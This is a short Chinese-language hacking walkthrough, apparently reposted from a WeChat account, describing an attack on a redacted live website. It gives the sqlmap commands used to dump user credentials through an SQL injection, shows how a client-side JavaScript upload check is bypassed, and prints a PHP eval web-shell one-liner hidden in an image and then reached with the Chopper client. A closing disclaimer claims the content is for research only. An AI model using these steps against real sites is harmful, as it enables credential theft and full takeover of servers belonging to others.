注入+本地JS绕过拿shell

2024年12月10日17:33:53评论6 views字数 424阅读1分24秒阅读模式

实战开始

1.找注入点

注入+本地JS绕过拿shell

2.测试是否有注入：
http://xxxxxx/xxxx.php?id=6’ ,没有回显

注入+本地JS绕过拿shell

输入：http://xxxxxx/xxxx.php?id=6 and 1=1 有回显，and 1 = 2，没有回显,说明存在注入。

3. 使用sqlmap跑。
sqlmap.py -u “http://xxxxx/xxxx.php?id=6”

注入+本地JS绕过拿shell

发现有注入，然后使用–dbs，–tables，–columns，–dump找出用户名和密码。

4.使用御剑扫描后台。然后进行登录。

注入+本地JS绕过拿shell

上传脚本木马发现有黑名单。通过右键审查元素，发现是本地js校验。

注入+本地JS绕过拿shell

5.找到表单form，删除相对应的脚本。重新上传php一句话，发现

注入+本地JS绕过拿shell

6.试下图片马,将图片使用C32Asm打开，在最后面添加一句话：<?php @ eval ( $_POST [ 'cmd' ]); ?>

注入+本地JS绕过拿shell

7.然后上传，发现上传成功，使用菜刀连接，密码cmd。

注入+本地JS绕过拿shell

如有侵权，请联系删除

原文始发于微信公众号（我爱林）：实战 || 注入+本地JS绕过拿shell

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。